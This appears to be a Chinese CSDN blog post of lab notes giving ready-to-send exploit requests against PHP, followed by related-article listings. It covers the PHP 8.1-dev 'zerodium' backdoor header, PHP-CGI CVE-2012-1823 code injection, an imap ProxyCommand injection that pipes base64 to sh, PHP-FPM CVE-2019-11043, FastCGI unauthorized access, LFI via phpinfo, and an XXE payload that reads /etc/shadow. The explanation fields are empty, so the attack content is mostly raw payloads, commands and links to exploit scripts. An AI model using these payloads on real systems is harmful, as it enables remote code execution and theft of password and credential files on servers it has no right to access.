php、php-dev、php-cgi、php-imap、php-fpm、xxe漏洞合集

最新推荐文章于 2024-11-26 22:53:51 发布
最新推荐文章于 2024-11-26 22:53:51 发布
阅读量173 收藏 1
点赞数 2
文章标签: php 开发语言 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46626737/article/details/131500370
版权
文章详细介绍了多个PHP版本中的安全漏洞,包括PHP8.1-dev的后门事件,PHP-CGI的远程代码执行漏洞(CVE-2012-1823),PHPimap远程命令执行漏洞(CVE-2018-19518),PHP-FPM远程代码执行漏洞(CVE-2019-11043)以及PHP文件包含漏洞,PHP环境的XML外部实体注入(XXE)漏洞。每个漏洞都提供了操作技巧和受影响的版本。
摘要由CSDN通过智能技术生成

1.php 8.1-dev开发版本后门事件
        操作技巧:
            GET / HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            User-agentt: zerodiumphpinfo();
            Accept-Encoding: gzip, deflate
            Connection: close
            Upgrade-Insecure-Requests: 1
        漏洞原理:
        漏洞版本:8.1.0-dev
    2.PHP-CGI远程代码执行漏洞(CVE-2012-1823)
        操作技巧:
            POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Connection: close
            Upgrade-Insecure-Requests: 1
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 44

            <?php echo shell_exec("cat /etc/passwd"); ?>
        漏洞原理:
        漏洞版本:php < 5.3.12 or php < 5.4.2
    3.PHP imap 远程命令执行漏洞(CVE-2018-19518)
        操作技巧:
            POST / HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 132
            Origin: http://192.168.68.129:8080
            Connection: close
            Referer: http://192.168.68.129:8080/
            Upgrade-Insecure-Requests: 1

            hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=qldan&password=jd1kn132
        漏洞原理:
        漏洞版本:
    4.PHP-FPM 远程代码执行漏洞(CVE-2019-11043)
        操作技巧:
            使用go语言运行https://github.com/neex/phuip-fpizdam.git 网站下的包
            执行http://your-ip:8080/index.php?a=cat/etc/passwd 即可
        漏洞原理:
        漏洞版本:PHP 7.0、7.1、7.2、7.3
    5.PHP-FPM Fastcgi 未授权访问漏洞
        操作技巧:
            去https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75下载exp脚本
            执行命令python fpm.py 127.0.0.1 /usr/local/lib/php/PEAR.php -c '<?php echo `cat /etc/passwd`;?>'(注意命令旁边是`,不是引号,且只能在linux中执行)
        漏洞原理:
        漏洞版本:
    6.php文件包含漏洞(利用phpinfo)
        操作技巧:
            去https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py下载exp脚本
            执行命令python2 in.py 127.0.0.1 8080 100
            访问http://your-ip:8080/lfi.php?file=/tmp/g&1=system('id');
        漏洞原理:
        漏洞版本:
    7.PHP环境 XML外部实体注入漏洞(XXE)
        操作技巧:
            POST /dom.php HTTP/1.1
            Host: 192.168.68.129:8080
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
            Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
            Accept-Encoding: gzip, deflate
            Connection: close
            Upgrade-Insecure-Requests: 1
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 165

            <?xml version="1.0" encoding="utf-8"?> 
            <!DOCTYPE xxe [
            <!ELEMENT name ANY >
            <!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
            <root>
            <name>&xxe;</name>
            </root>
        漏洞原理:
        漏洞版本:<libxml2.9.0

!QK
关注
php 5.6.3是否存在漏洞,PHP一次性爆出三个cve漏洞
weixin_42298507的博客
03-11 1510
PHP一次性爆出三个cve漏洞2015-06-19 14:05:20阅读:0次研究人员在近期发现php三个漏洞。这三个漏洞分别是:os命令注入漏洞、在堆里面的整型溢出漏洞,还有个本地段错误漏洞。第一个是新漏洞,后两个是由于补丁修补不全重新导致的漏洞。首先让我们来看第一个漏洞:OS command injection vulnerability in escapeshellarg[CVE-2015-...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1393
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
php5.4.3的远程代码执行漏洞,提权挺管用
收集盒 Book box
09-20 4648
PHP com_print_typeinfo()的漏洞,通过PHP代码调用”exec”可运行SHELL命令 用这个提权是不是很方便了? // Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)ema
php5.3.x 漏洞,ThinkPHP 3.X/5.X order by注入漏洞
weixin_34124963的博客
03-20 663
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领...
ctfshow phpCVE web311-web315 wp
mumuzi的博客
02-04 2013
ctfshow-php-CVE-wp----------
PHP7.x的 PHP-FPM 存在远程代码执行漏洞
kuzina111的博客
10-29 4256
据外媒 ZDNet 的报道,PHP 7.x 中最近修复的一个远程代码执行漏洞正被恶意利用,并会导致攻击者控制服务器。编号为CVE-2019-11043的漏洞允许攻击者通过向目标服务器发送特制的 URL,即可在存在漏洞的服务器上执行命令。漏洞利用的PoC代码也已在 GitHub 上发布。 一旦确定了易受攻击的目标,攻击者便可以通过在URL 中附加'?a=' 以发送特制请求到易受攻...
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 993
vulhub漏洞复现练习篇
php的empty的函数,PHP empty函数报错解决办法
weixin_42683392的博客
03-16 375
PHP empty函数报错解决办法PHP开发时,当你使用empty检查一个函数返回的结果时会报错:Fatal error: Can't use function return value in write context例如下面的代码:复制代码 代码如下:echo empty(strlen('test'));转到PHP手册里面查看,在empty函数描述的地方有以下文字:复制代码 代码如下:Note...
【废了-准备删除02】信息收集——基于WAMP的drupal7.x管理系统
热门推荐
Fighting_hawk的博客
03-23 1万+
1.本节内容对目标站点进行信息收集,包括IP、端口、目录、指纹等,为后续渗透测试提供了方向。 2. 对于139端口,是samba服务端口,可以考虑爆破、未授权访问、远程代码执行。 3.对于445端口,是SMB服务端口,可以考虑空会话攻击。 4.对于3306端口,可以考虑注入、提权、爆破。 5. 对于80端口,可以考虑Web 攻击、爆破、对应服务器版本漏洞。...
解决php-fpm.service not found问题的办法
01-21
本文给大家详细介绍了解决php-fpm.service not found问题的相关内容,文中介绍的非常详细,下面来一起看看详细的介绍: 环境介绍 环境:ubuntu 16.04 64 php 版本:php-7.1.4 发现问题 正常编译安装 php 按照以前...
php环境配置之CGI、FastCGIPHP-CGIPHP-FPM、Spawn-FCGI比较?
12-18
PHP-FPM (FastCGI Process Manager) 是PHP的一个附加组件,用于更有效地管理PHP-CGI进程。PHP-FPM提供了更好的进程管理功能,如平滑重启、错误日志记录、资源限制等。它允许动态调整CGI进程的数量,以适应不同负载。...
centos7上编译安装php7以php-fpm方式连接apache
10-17
CentOS 7 编译安装 PHP 7 并使用 PHP-FPM 连接 Apache 的知识点包括了以下几个方面: 1. **准备工作**: 在进行编译安装之前,确保系统已经安装了开发工具包,例如 GCC,以及 Apache 的开发包 httpd-devel,因为...
alpine-php-fpm:轻量级且经过优化PHP-FPMPHP v7.4和v8.0),在Alpine Linux v3.12之上具有重要的扩展
03-08
高山PHP-FPM PHP-FPMPHP 和 )具有在之上的基本扩展。 PHP 7.4 PHP 8.0 内置扩展 卷曲 ftp 哈希(mhash) libedit 钠 mbstring mysqlnd 的openssl 密码-argon2 pdo-sqlite 梨 sqlite3 zlib 其他扩展 ...
docker-nginx-fpm-alpine:基于 Nginx、php-fpm 和 Alpine Linux 堆栈的 PrivateBin docker 镜像
08-05
Nginx、php-fpm 和 Alpine 上的 PrivateBin PrivateBin是一个极简主义的开源在线 ,其中服务器对粘贴的数据零知识。 数据在浏览器中使用 256 位 AES 以进行加密和解密。 此存储库包含在安全默认配置中使用预安装的...
Linux宝塔部署wordpress网站更换服务器IP后无法访问管理后台和打开网站页面显示错乱
最新发布
星如雨落
11-26 101
htaccess文件,必须使用新建站点时创建的这2个文件。做好备份,替换掉老wordpress网站根目录下这2个文件。1.wordpress搬家后,在新服务器上,新建站点时,会创建4个默认文件,其中.user.ini文件和。登陆Linux宝塔面板,使用phpMyAdmin工具打开wordpress数据库。在wordpress数据库的wp_postmeta表中,在wordpress数据库的wp_options表中,在wordpress数据库的wp_users表中,_menu_item_url值。
如何使用PHP爬虫获取店铺详情:一篇详尽指南
2401_87849308的博客
11-26 392
在数字化时代,数据的价值不言而喻。对于企业来说,获取竞争对手的店铺详情、顾客评价等信息对于市场分析和决策至关重要。PHP作为一种广泛使用的服务器端脚本语言,结合其强大的库支持,使得编写爬虫程序变得简单而高效。本文将详细介绍如何利用PHP爬虫技术获取店铺详情,并提供实际的代码示例。
PHP 类型比较
lly202406的博客
11-26 309
PHP是一种流行的服务器端脚本语言,广泛用于网页开发。在PHP中,类型比较是一个重要的概念,它涉及到如何比较两个变量的值和类型。本文将详细介绍PHP中的类型比较,包括严格比较和非严格比较,以及它们在实际编程中的应用。
linux实战-黑链——玄机靶场
weixin_47472573的博客
11-24 826
web站点被挂黑链后的处理方法
2062:【例1.3】电影票(http://ybt.ssoier.cn:8088/problem_show.php?pid=2062)
2401_84075976的博客
11-23 578
已知一位小朋友的电影票价是10元,计算x位小朋友的总票价是多少?人数和电影票总价,中间用一个空格隔开。
Nginx与PHP-FPM的交互机制解析
"深入理解nginx与php-fpm的交互机制及其在Web服务器中的应用" Nginx(engine x)是一款高性能的HTTP和反向代理服务器,同时也支持IMAP/POP3/SMTP服务。它以其轻量级、高并发的特性被广泛应用于网站服务器,尤其适合...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值